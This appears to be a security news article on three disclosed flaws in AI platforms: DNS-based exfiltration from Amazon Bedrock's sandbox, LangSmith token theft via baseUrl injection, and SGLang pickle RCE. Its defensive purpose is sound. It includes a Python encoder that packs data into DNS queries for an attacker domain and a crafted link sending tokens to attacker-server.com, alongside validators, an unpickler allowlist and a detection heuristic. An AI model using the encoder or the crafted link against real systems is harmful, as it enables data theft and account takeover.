Three critical security flaws discovered in Amazon Bedrock, LangSmith, and SGLang have exposed a fundamental problem plaguing AI infrastructure: sandbox isolation is failing spectacularly. These vulnerabilities demonstrate that even managed AI services from tech giants aren’t immune to classic attack patterns, revealing how quickly the AI gold rush has outpaced security fundamentals.
The flaws—ranging from DNS-based data exfiltration to remote code execution—paint a stark picture of an industry prioritizing speed over security. This isn’t just another vulnerability disclosure; it’s a wake-up call about the systemic weaknesses in AI platform isolation.
Amazon Bedrock: When “No Network Access” Means Something Else Entirely
Amazon Bedrock AgentCore Code Interpreter’s sandbox mode contains a glaring contradiction: despite advertising “no network access,” it permits outbound DNS queries that attackers can weaponize for data theft and command-and-control operations. The vulnerability, scored at 7.5 out of 10.0 on the CVSS scale, enables threat actors to:
- Establish bidirectional communication channels using DNS queries
- Obtain interactive reverse shells
- Exfiltrate sensitive data from accessible AWS resources
- Execute commands via DNS-delivered payloads
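To make the risk concrete: even with TCP and UDP egress blocked, code running in the sandbox can smuggle data out by encoding it into the labels of DNS lookups for a domain the attacker controls. A minimal sketch of the encoding side, assuming a hypothetical attacker domain (this only builds the query names; it does not resolve them):

```python
import base64

def dns_exfil_queries(data: bytes, attacker_domain: str, max_label: int = 63):
    """Chunk arbitrary data into DNS-safe labels under an attacker domain.

    Individual DNS labels are limited to 63 bytes, so the payload is
    base32-encoded (a case-insensitive, DNS-safe alphabet) and split
    across as many query names as needed.
    """
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [encoded[i:i + max_label] for i in range(0, len(encoded), max_label)]
    # A sequence number per chunk lets the attacker's nameserver reassemble
    # the payload from the queries it receives.
    return [f"{seq}.{chunk}.{attacker_domain}" for seq, chunk in enumerate(chunks)]
```

Any resolver inside the sandbox that forwards these lookups upstream completes the channel, which is why "no network access" that still permits DNS is not isolation.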
What makes this particularly dangerous is the potential for overprivileged IAM roles. A simple misconfiguration can grant the Code Interpreter broad permissions to access sensitive data across AWS infrastructure, turning a contained breach into a full-scale data exfiltration operation.
“Amazon Bedrock allows DNS-based data exfiltration, LangSmith had full account takeover, SGLang is still unpatched. Three major AI platforms, three different attack vectors, one common problem: isolation in AI systems is still treated as an afterthought.” — @NolteIT
Amazon’s response reveals a troubling industry mindset: they’ve classified this as “intended functionality” rather than a defect, pushing responsibility onto customers to use VPC mode for proper isolation. This echoes the early cloud computing era when providers similarly deflected security concerns onto customer configuration.
LangSmith: Social Engineering Meets AI Observability
LangSmith, a popular AI development platform, suffered from a high-severity URL parameter injection flaw (CVE-2026-25750, CVSS: 8.5) that exposed users to token theft and account takeover. The vulnerability stemmed from inadequate validation of the baseUrl parameter, allowing attackers to redirect API calls to malicious servers.
The attack vector is deceptively simple: trick a user into clicking a specially crafted link such as smith.langchain.com/studio/?baseUrl=https://attacker-server.com. Once the victim follows the link, their bearer token, user ID, and workspace ID are transmitted to the attacker’s infrastructure.
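The underlying fix is strict host allowlisting. A minimal sketch of the kind of validation that defeats this bug class, assuming a hypothetical allowlist (this is illustrative, not LangSmith's actual patch):

```python
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would enumerate its known API hosts.
ALLOWED_API_HOSTS = {"api.smith.langchain.com"}

def validate_base_url(raw: str) -> str:
    """Reject any baseUrl that would send credentials to a third party."""
    parsed = urlparse(raw)
    if parsed.scheme != "https":
        raise ValueError("baseUrl must use https")
    if parsed.hostname not in ALLOWED_API_HOSTS:
        raise ValueError(f"baseUrl host not allowed: {parsed.hostname!r}")
    return raw
```

Checking the parsed hostname, rather than substring-matching the raw string, matters: a URL like https://api.smith.langchain.com.attacker-server.com sails past a naive prefix check but fails an exact hostname comparison.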
The implications extend far beyond individual accounts. Successful exploitation grants access to AI trace history, internal SQL queries, CRM records, and proprietary source code—essentially the crown jewels of AI development operations.
SGLang: Triple Threat with Pickle Vulnerabilities
SGLang, an open-source framework for serving large language models, harbors three critical vulnerabilities that remain unpatched as of this writing. All three stem from unsafe pickle deserialization—a vulnerability class that has plagued Python applications for over a decade:
- CVE-2026-3059 (CVSS: 9.8): Unauthenticated RCE through ZeroMQ broker
- CVE-2026-3060 (CVSS: 9.8): Unauthenticated RCE through disaggregation module
- CVE-2026-3989 (CVSS: 7.8): Insecure pickle deserialization in crash dump utility
These flaws allow attackers to achieve remote code execution by sending malicious pickle files to exposed services. The first two vulnerabilities are particularly severe, requiring no authentication and affecting any deployment with network-exposed multimodal or disaggregation features.
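Pickle is dangerous because deserialization can invoke arbitrary callables via an object’s __reduce__ hook. Where a pickle-based protocol cannot simply be replaced with a safe format such as JSON or msgpack, a common mitigation is a restricted unpickler that allowlists the exact classes the protocol legitimately exchanges. A sketch, with an allowlist that is purely illustrative (not SGLang’s):

```python
import io
import pickle

# Illustrative allowlist of harmless builtins; a real service would list
# exactly the types its wire protocol legitimately exchanges.
_ALLOWED_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"),
    ("builtins", "str"), ("builtins", "int"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # pickle calls find_class for every global the stream references;
        # blocking here stops a malicious payload before any code runs.
        if (module, name) not in _ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Even this is defense in depth rather than a guarantee; the robust fix is to stop accepting pickle from the network entirely.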
“DNS-based exfiltration in Bedrock shows that even managed AI services aren’t immune to classic attack patterns. The problem: multi-tenant isolation is hard. When your workload shares infrastructure with untrusted code, you inherit its risks. This is why AI platforms need tenant isolation audits, not just vulnerability patches.” — @visions3c
The Isolation Crisis: Lessons from Computing History
These vulnerabilities mirror security failures from earlier computing paradigms. The DNS exfiltration technique used against Bedrock is a direct descendant of DNS tunneling, a data-theft and command-and-control method attackers have used to slip past network controls since the early 2000s. Similarly, pickle deserialization attacks have been a known threat vector since the early days of Python web applications.
The AI industry appears to be repeating the same isolation mistakes that plagued virtual machines, containers, and early cloud platforms. Just as virtualization vendors had to evolve from software techniques like binary translation to hardware-assisted virtualization, AI platforms need fundamental architectural changes to achieve true isolation.
Immediate Action Items for AI Security
Organizations running AI workloads need to implement these defensive measures immediately:
- Audit all Code Interpreter instances and migrate critical workloads from sandbox to VPC mode
- Implement DNS firewalls to filter outbound DNS traffic from AI environments
- Apply the principle of least privilege to IAM roles attached to AI services
- Monitor for unexpected network connections from AI processes
- Restrict access to SGLang interfaces and ensure they’re not exposed to untrusted networks
- Update LangSmith to version 0.12.71 or later
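For the DNS filtering and monitoring items, one practical heuristic is to flag lookups whose labels look like encoded payloads: they tend to be far longer and higher-entropy than ordinary hostnames. A minimal sketch, with thresholds that are illustrative starting points rather than tuned values:

```python
import math
from collections import Counter

def _shannon_entropy(s: str) -> float:
    """Bits of entropy per character of the string."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_like_dns_exfil(qname: str, max_qname_len: int = 100,
                         max_label_len: int = 30,
                         entropy_threshold: float = 3.5) -> bool:
    """Flag DNS query names with very long or high-entropy labels."""
    if len(qname) > max_qname_len:
        return True
    labels = qname.rstrip(".").split(".")
    return any(len(label) > max_label_len
               and _shannon_entropy(label) > entropy_threshold
               for label in labels)
```

In practice a check like this would run over resolver query logs and raise alerts rather than block outright, since a hard block on false positives can break legitimate services that use long generated hostnames.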
The Bigger Picture: Security as an Afterthought
These discoveries highlight a systemic problem in AI development: security considerations are consistently treated as afterthoughts rather than foundational requirements. The rush to deploy AI capabilities has created a security debt that’s now coming due.
“🛑 Amazon Bedrock, LangSmith, and SGLang flaws expose data leaks, token theft, and RCE risks across AI platforms. Bedrock allows DNS-based exfiltration, LangSmith had account takeover, and SGLang remains vulnerable—showing weak isolation in real-world AI systems.” — @TheHackersNews
The fact that Amazon classifies DNS exfiltration as “intended functionality” rather than a security flaw demonstrates how the industry prioritizes flexibility over security. This approach worked when AI systems processed sanitized datasets in isolated research environments, but it’s completely inadequate for production systems handling sensitive data.
Building Secure AI Infrastructure
The path forward requires fundamental changes to how we architect AI systems. Rather than bolting security onto existing platforms, the industry needs to rebuild isolation mechanisms from the ground up. This means implementing hardware-assisted isolation, zero-trust networking, and assuming that AI workloads will attempt to escape their containers.
The cost of fixing these vulnerabilities after deployment far exceeds the investment required to build secure systems from the start. As AI systems become more autonomous and handle increasingly sensitive data, the stakes will only continue to rise.
These three vulnerabilities serve as a stark reminder that the AI revolution cannot succeed without a corresponding security evolution. The question isn’t whether more AI platforms will suffer similar breaches—it’s whether the industry will learn from these failures before the next wave of attacks hits.